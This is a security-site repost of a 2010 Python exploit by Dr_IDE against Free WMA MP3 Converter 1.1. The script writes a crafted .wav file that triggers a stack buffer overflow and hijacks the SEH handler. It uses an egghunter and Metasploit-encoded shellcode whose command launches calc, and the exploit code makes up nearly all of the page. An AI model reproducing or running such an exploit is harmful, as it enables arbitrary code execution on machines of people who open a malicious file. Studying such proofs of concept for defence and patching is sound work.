首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Free WMA MP3 Converter 1.1 Buffer Overflow Exploit (SEH)
来源:http://pocoftehday.blogspot.com 作者:Dr_IDE 发布时间:2010-11-15  

#!/usr/bin/env python
##############################################################################
#
# Free WMA MP3 Converter 1.1 Buffer Overflow Exploit (SEH)
# Coded By:     Dr_IDE
# Date:         November 10, 2010
# Download:     http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm
# Tested on:    Windows XPSP3
# Greets:       edb team
# Notes: Egghunter was for fun, not required though.
#
###############################################################################

# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
# Egg is already injected
code=(
"\x80\x87\x78\x68\x80\x87\x78\x68\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43"
"\x4a\x4a\x49\x4b\x4c\x4a\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51"
"\x55\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50"
"\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a\x4b\x51\x59\x4c\x4b\x50"
"\x34\x4c\x4b\x43\x31\x4a\x4e\x46\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49"
"\x50\x42\x54\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c\x4b\x51\x4f\x47"
"\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45"
"\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51"
"\x4c\x46\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50\x56\x42"
"\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x44\x30\x45"
"\x4c\x4e\x4d\x4c\x4b\x43\x58\x45\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42"
"\x4a\x50\x50\x43\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43\x51\x42\x4c\x42"
"\x43\x43\x30\x41\x41")

eggy=(
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x80\x87\x78\x68\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

nops=("\x90" * 8)
nseh=("\xEB\x06\x90\x90")
rseh=("\xEF\xF7\x4A\x00")   #Universal P/P/R - Wmpcon.exe  
buf1=("\x41" * 1000)
buf2=("\x42" * (4116 - len(buf1+nops+code)))
junk=("\x43" * (8000 - len(buf1+buf2+nseh+rseh)))

evil=(buf1+nops+code+buf2+nseh+rseh+nops+eggy+junk);

f1 = open('Dr_IDE.wav','w');
f1.write(evil);
f1.close();

#[http://pocoftehday.blogspot.com]


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mozilla Firefox <= 3.6.12 Remo
·Camtron CMNC-200 IP Camera Den
·DBSite Remote SQL Injection Vu
·Power Audio Editor v7.4.3.230
·Foxit Reader 4.1.1 Stack Buffe
·VbsEdit v 4.7.2.0 (.vbs) Buffe
·Realtek Audio Control Panel 1.
·Visual MP3 Splitter & Joiner 6
·Realtek Audio Microphone Calib
·E-Xoopport v3.1 eCal display.p
·Realtek HD Audio Control Panel
·Mp3-Nator 2.0 Buffer Overflow
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved